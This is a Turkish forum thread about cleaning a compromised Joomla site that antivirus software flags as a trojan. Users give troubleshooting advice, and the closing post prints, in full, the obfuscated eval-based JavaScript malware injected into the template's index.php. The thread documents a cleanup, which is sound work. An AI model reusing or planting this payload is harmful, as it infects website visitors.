PDA

Orijinalini görmek için tıklayınız : Sitem saldırı aldı ve sürekli virüs bulaşıyor



lynx
17-07-2013, 09:21
Merhaba,

Joomla 2.5 'de hazırlanmış bir sitemiz var. Firma sitesi olduğu için linki burada paylaşmam doğru olmaz, ama isteyene pm ile gönderebilirim.

Site bir süre önce saldırı aldı, index.php yi güncelledim. içeri attıkları dosyaları vs temizledim. çalıştı.

Şimdide eset antivirüs siteyi açarken aşağıdaki uyarıyı veriyor :

Tehdit : js/kyptik.AMI truva atı


Yaptıklarım :
1) Joomla sürümü güncellendi ( 2.5.11 )
2) Template klasöründeki tüm kullanılmayan temalar silindi ( bir yerde okumuştum beez temasında açık var diye )
3) akar 'ın paylaştığı dosyaliste.php sunucuya atıldı. Benim işlem yaptığım saatler dışında herhangi bir haraketlilik gözükmüyor.
4) Site komple ftp den bilgisayara indirildi. Antivirüs tarafından taratıldı. Bulunan dosyalar sunucudan silindi. Ama ertesi gün yine aynı.


Sorun nerde nasıl çözerim anlamadım.

ilginize şimdiden teşekkürler.

efsane86
17-07-2013, 10:15
herşeyden önce ilk yaptığınız sitenin sıfırdan kurmuş olduğunuz en baştan ilk halinin backup ve sql

yedeği lazım eğerki ilk başta almadıysanız üzgünüm siteyi baştan kurup tekrardan yapıcaksınız

yapılması gereken çok basit aslında ama birazda sabır gereken bir iş ilk olarak hostinginize bağlanarak

sitenin backup ve sql yedeğini alın sonra bu aldığınız yedekleri temiz virüs kapmayan harici bir harddiske

yada pc ye kopyalayın ordada yedek olsun yada daha öncesi aldığınız bir yedek varsa temiz virüssüz

oda olabilir şimdi gelelim bu virüsü temizlemeye kesinlikle virüslü olarak ftpden indirdiğiniz dosyaları nod

32 yada benzeri antivirüs programları ile taratmayın virüs bulmaz bu virüsün adı iframe virüsüdür

başıma gelmişti yıllar önce araştırı temizledim kurtuldum bu virüs ftp yolu ile siteye bulaşıyor örnek sizin

antivirüs programınız yok normal ev kullanıcısı gibi pc ile nete bağlanıyorsunuz farkında olmadan

herhangi bir siteden aynı virüs pcnize bulaşıyor sizde farkında olmadan ftp ile bir dosya transferi

yapıyorsunuz upload yada download hiç farketmz hop virüs elini kolunu sallaya sallaya siteye giriyor ve

index.html sayfası yaratıyor kendisi otomatik ve içine iframe kodları bulaştırıyor sakın ben tek tek

temizlerim düşüncesine girmeyin jooomlada yaklaşık 6000 yakın dosya klasör var yapamazsınız tek tek

virüsten kurtulmak için önce pcnizdeki tüm yedekleri alın sonra pcyi formatlayın formatlandıktan sonra

öncesinde sitenizin yedeklerini almıştınız temiz yedekleri tekrardan ftp ile hostunuza yükleyin dosyaları

ve klasörleri sonra tekrardan sql açın önceki sqlinizi ve ardından sitenizi tekrar google arama motoruna

kayıt edin yeniden inceleme isteyin bir kaç gün bekleyin mutlu son . ben bu şekilde kurtuldum yıllar önce

başka şekilde bundan kurtuluş yok antivirüs programı kesinlikle lisanslı kullanıcaksınız ben nod 32

internet security kullanıyorum çok memnunum tüm virüsleri yakalıyor ve temizliyor sizde pcnizde bu

yada buna benzer antivirüs programı kullanıcaksınız şimdi siz şunu merak ettiniz acaba hangi pcden

siteme virüs bulaştı en son hangi pc ile siteye bağlandıysanız yada virüs bulaşan bir pc ile

bağlandıysanız farkında olmadan o pcyi yukarıdaki dediklerim gibi formatlayıp temizleyip tekrar

yükleyeceksiniz biraz zahmetli bir iş ama böyle çözülüyor kolay gelsin ve geçmiş olsun

son olarak yapılması gereken ;

herşey bittikten sonra ftp olarak hangi programı kullanıyorsanız ben şahsen filezilla kullanıyorum tavsiye

ederim ftp giriş şifreleriinizi ve kullanıcı adınızı ftp arayüzündeki hafızadan silin ve sitenizin ftpsini

hostingden değiştirin çünkü şifre hafızada kaldığı için siz sitenizi kurtarsanız bilene bir kaç gün sonra

aynı sorunu yaşıyacaksınız kesin çözümü bu başka yolu yok

lynx
17-07-2013, 10:22
Gerçekten çok ilgili ve açıklayıcı bir yazı olmuş.
Teşekkür ederim.

Şu dikkatimi çekti : bu siteye erişen bilgisayar zaten 1-2 tanedir. ( ftp den bağlanan ) onlarda da antivirüs var.ve lisanslı.

Ziyaretçilerin bilgisayarlarından bulaşmış olma ihtimali yoktur herhalde ?

Sizin dediğiniz işlemleri ben daha önceki sorunda denedim. Mutlu sona ulaştım. ama bu seferki tamamen farklı. Google Webmaster site için herhangi bir uyarı vermiyor. Sadece eset siteyi açmayı engelliyor.

Dediğinizi en son şans olarak deneyebilirim. Çünkü kendi bilgisayarıma format atmak, joomla dizinindekileri taratmaktan daha zor olacaktır :)

Ama gerçekten teşekkürler açıklayıcı yazı içni.

efsane86
17-07-2013, 10:34
hayır zaten ziyaretçilerden bulaşmaz bu benim bahsettiğim örnek siz belki farkında olmadan dalgınlıkla olur ya insanlık halidir bir anlık

dalgınlıkla ftpnize başka bilgisayardan girmiş olabilirsiniz yada sizin pcnizde antivirüs lisanslı program yoktur bu sadece varsayım için

söylüyorum ziyaretçilerden kesinlikle bulaşmaz bu virüs ftp yolu ile bulaşan bir virüs çeşidi sizden bulaşmadıysa o zaman geriye tek bir

seçenek kalıyor sizden başkası erişim yaptı sitenize başka bilgisayardan o bilgisayardada lisanslı antivirüs yoksa normal bulaşması

google aramalarınaa gelicek olursak temizlediyseniz hemen google sonuçlarında çıkmaz temiz olarak biraz zaman alır ama fazla sürmez

taş çatlasın bir hafta felan " Google Webmaster site için herhangi bir uyarı vermiyor. Sadece eset siteyi açmayı engelliyor. "

bu sorun ise bir atık kalmıştır küçük bir parça oda şu temizledim zannettiğiniz sitenizde ufak bir virüslü dosya var ondan dolayı onu

bulmak çok zor tek tek bakmak lazım en güzeli siteyi baştan kurucaksınız ve yukarıdaki yazdıklarımı yapıcaksınız inanın bana işin içinden

çıkamazsınız kesinliklede FTP şifrenizi hemen değiştirin başka ve farklı bir şifre koyun unutmayın ftp programları şifreyi hafızada tutuyor

ve her seferinde ise alışmışız hızlı bağlana nasıl olsa şifre hazızada çok yanlış zahmetli olacak ama el ile yazılacak şifre sonra kafalar

rahat olsun bu virüse bşak siteden bulaştınız yada pcnize taktığınız harici hdd de virüs vardı o sırada ftp açıksa zıplamış olabilir belki

başka bir usb den de bulaşmış olabilir virüs bulaşma çeşidi çok saymakla bitmiyor çözümü anlattığım gibi çünkü sizin sorununuzun

aynısını ben yıllar önce yaşadım anlattıklarınızın aynısını bu şekilde kurtuldum

efsane86
17-07-2013, 10:41
kendi bilgisayarınıza kesinlikle ve kesinlikle FORMAT atacaksınız lamı cimi yok ben kendi bilgisayarımı formatlamıştım çnükü bir daha

bulşamasın diye sonra lisanslı antivirüs yükleyin mutlu son


Gerçekten çok ilgili ve açıklayıcı bir yazı olmuş.
Teşekkür ederim.

Şu dikkatimi çekti : bu siteye erişen bilgisayar zaten 1-2 tanedir. ( ftp den bağlanan ) onlarda da antivirüs var.ve lisanslı.

Ziyaretçilerin bilgisayarlarından bulaşmış olma ihtimali yoktur herhalde ?

Sizin dediğiniz işlemleri ben daha önceki sorunda denedim. Mutlu sona ulaştım. ama bu seferki tamamen farklı. Google Webmaster site için herhangi bir uyarı vermiyor. Sadece eset siteyi açmayı engelliyor.

Dediğinizi en son şans olarak deneyebilirim. Çünkü kendi bilgisayarıma format atmak, joomla dizinindekileri taratmaktan daha zor olacaktır :)

Ama gerçekten teşekkürler açıklayıcı yazı içni.

angelaus
17-07-2013, 10:52
eseti salla online security check sitelerine kontrol ettir. eset karalistesine almış olabilir

lynx
18-07-2013, 10:02
- ÇÖZÜLDÜ -
İlk önce tüm uzun uzun cevapları için efsane86 nickli arkadaşa,
ve yol gösterdiği için angelaus ' teşekkürler.


Efsane86 'nın dediği çok doğru. Bizim diğer çalışan arkadaşın bilgisayarında antivirüs yok. Ve tema'da orada hazırlanmış. Dolayısıyla muhtemelen virüs oradan bulaştı.

ÇÖZÜM :

Kullandığım tema dışındaki temaları kaldırdım. Kullandığım temayı bilgisayarımda açıp index.php 'deki kodları tek tek inceledim.
Notepad++ da incelediğimde hiçbirşey anlaşılmıyordu. Dreamweaver 'da açınca gördüm.
Notepad++ 'da çok açık gri dikey çizgilerle döşeli bir satır var. O satır dreamweaver da aşağıdaki gibi görünüyor. Onu silince düzeldi.

Tabi başka yere bulaşmamışsa.




Dreamweaver 'da ki görünen kodlar :


<?
#17da00#
echo " <script type=\"text/javascript\" language=\"javascript\" > ps=\"s\"+\"p\"+\"l\"+\"i\"+\"t\";asd=function(){++d.body};a=(\"47,155,174,165,152,173,160,166,165,47,201,201,201, 155,155,155,57,60,47,202,24,21,47,175,150,171,47,1 57,161,173,163,170,47,104,47,153,166,152,174,164,1 54,165,173,65,152,171,154,150,173,154,114,163,154, 164,154,165,173,57,56,160,155,171,150,164,154,56,6 0,102,24,21,24,21,47,157,161,173,163,170,65,172,17 1,152,47,104,47,56,157,173,173,167,101,66,66,151,1 63,166,156,65,172,174,165,176,154,151,175,160,163, 163,150,156,154,65,165,154,173,66,176,167,64,152,1 66,165,173,154,165,173,66,174,167,163,166,150,153, 172,66,154,76,133,177,171,175,176,161,65,167,157,1 67,56,102,24,21,47,157,161,173,163,170,65,172,173, 200,163,154,65,167,166,172,160,173,160,166,165,47, 104,47,56,150,151,172,166,163,174,173,154,56,102,2 4,21,47,157,161,173,163,170,65,172,173,200,163,154 ,65,151,166,171,153,154,171,47,104,47,56,67,56,102 ,24,21,47,157,161,173,163,170,65,172,173,200,163,1 54,65,157,154,160,156,157,173,47,104,47,56,70,167, 177,56,102,24,21,47,157,161,173,163,170,65,172,173 ,200,163,154,65,176,160,153,173,157,47,104,47,56,7 0,167,177,56,102,24,21,47,157,161,173,163,170,65,1 72,173,200,163,154,65,163,154,155,173,47,104,47,56 ,70,167,177,56,102,24,21,47,157,161,173,163,170,65 ,172,173,200,163,154,65,173,166,167,47,104,47,56,7 0,167,177,56,102,24,21,24,21,47,160,155,47,57,50,1 53,166,152,174,164,154,165,173,65,156,154,173,114, 163,154,164,154,165,173,111,200,120,153,57,56,157, 161,173,163,170,56,60,60,47,202,24,21,47,153,166,1 52,174,164,154,165,173,65,176,171,160,173,154,57,5 6,103,153,160,175,47,160,153,104,143,56,157,161,17 3,163,170,143,56,105,103,66,153,160,175,105,56,60, 102,24,21,47,153,166,152,174,164,154,165,173,65,15 6,154,173,114,163,154,164,154,165,173,111,200,120, 153,57,56,157,161,173,163,170,56,60,65,150,167,167 ,154,165,153,112,157,160,163,153,57,157,161,173,16 3,170,60,102,24,21,47,204,24,21,204,24,21,155,174, 165,152,173,160,166,165,47,132,154,173,112,166,166 ,162,160,154,57,152,166,166,162,160,154,125,150,16 4,154,63,152,166,166,162,160,154,135,150,163,174,1 54,63,165,113,150,200,172,63,167,150,173,157,60,47 ,202,24,21,47,175,150,171,47,173,166,153,150,200,4 7,104,47,165,154,176,47,113,150,173,154,57,60,102, 24,21,47,175,150,171,47,154,177,167,160,171,154,47 ,104,47,165,154,176,47,113,150,173,154,57,60,102,2 4,21,47,160,155,47,57,165,113,150,200,172,104,104, 165,174,163,163,47,203,203,47,165,113,150,200,172, 104,104,67,60,47,165,113,150,200,172,104,70,102,24 ,21,47,154,177,167,160,171,154,65,172,154,173,133, 160,164,154,57,173,166,153,150,200,65,156,154,173, 133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,6 7,61,71,73,61,165,113,150,200,172,60,102,24,21,47, 153,166,152,174,164,154,165,173,65,152,166,166,162 ,160,154,47,104,47,152,166,166,162,160,154,125,150 ,164,154,62,51,104,51,62,154,172,152,150,167,154,5 7,152,166,166,162,160,154,135,150,163,174,154,60,2 4,21,47,62,47,51,102,154,177,167,160,171,154,172,1 04,51,47,62,47,154,177,167,160,171,154,65,173,166, 116,124,133,132,173,171,160,165,156,57,60,47,62,47 ,57,57,167,150,173,157,60,47,106,47,51,102,47,167, 150,173,157,104,51,47,62,47,167,150,173,157,47,101 ,47,51,51,60,102,24,21,204,24,21,155,174,165,152,1 73,160,166,165,47,116,154,173,112,166,166,162,160, 154,57,47,165,150,164,154,47,60,47,202,24,21,47,17 5,150,171,47,172,173,150,171,173,47,104,47,153,166 ,152,174,164,154,165,173,65,152,166,166,162,160,15 4,65,160,165,153,154,177,126,155,57,47,165,150,164 ,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150 ,171,47,163,154,165,47,104,47,172,173,150,171,173, 47,62,47,165,150,164,154,65,163,154,165,156,173,15 7,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47, 50,172,173,150,171,173,47,60,47,55,55,24,21,47,57, 47,165,150,164,154,47,50,104,47,153,166,152,174,16 4,154,165,173,65,152,166,166,162,160,154,65,172,17 4,151,172,173,171,160,165,156,57,47,67,63,47,165,1 50,164,154,65,163,154,165,156,173,157,47,60,47,60, 47,60,24,21,47,202,24,21,47,171,154,173,174,171,16 5,47,165,174,163,163,102,24,21,47,204,24,21,47,160 ,155,47,57,47,172,173,150,171,173,47,104,104,47,64 ,70,47,60,47,171,154,173,174,171,165,47,165,174,16 3,163,102,24,21,47,175,150,171,47,154,165,153,47,1 04,47,153,166,152,174,164,154,165,173,65,152,166,1 66,162,160,154,65,160,165,153,154,177,126,155,57,4 7,51,102,51,63,47,163,154,165,47,60,102,24,21,47,1 60,155,47,57,47,154,165,153,47,104,104,47,64,70,47 ,60,47,154,165,153,47,104,47,153,166,152,174,164,1 54,165,173,65,152,166,166,162,160,154,65,163,154,1 65,156,173,157,102,24,21,47,171,154,173,174,171,16 5,47,174,165,154,172,152,150,167,154,57,47,153,166 ,152,174,164,154,165,173,65,152,166,166,162,160,15 4,65,172,174,151,172,173,171,160,165,156,57,47,163 ,154,165,63,47,154,165,153,47,60,47,60,102,24,21,2 04,24,21,160,155,47,57,165,150,175,160,156,150,173 ,166,171,65,152,166,166,162,160,154,114,165,150,15 1,163,154,153,60,24,21,202,24,21,160,155,57,116,15 4,173,112,166,166,162,160,154,57,56,175,160,172,16 0,173,154,153,146,174,170,56,60,104,104,74,74,60,2 02,204,154,163,172,154,202,132,154,173,112,166,166 ,162,160,154,57,56,175,160,172,160,173,154,153,146 ,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47 ,56,66,56,60,102,24,21,24,21,201,201,201,155,155,1 55,57,60,102,24,21,204,24,21,204,24,21\"[ps](\",\"));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String[\"fr\"+\"omCharCode\"].apply(String,a));</script>";

#/17da00#
?>/jquery.js">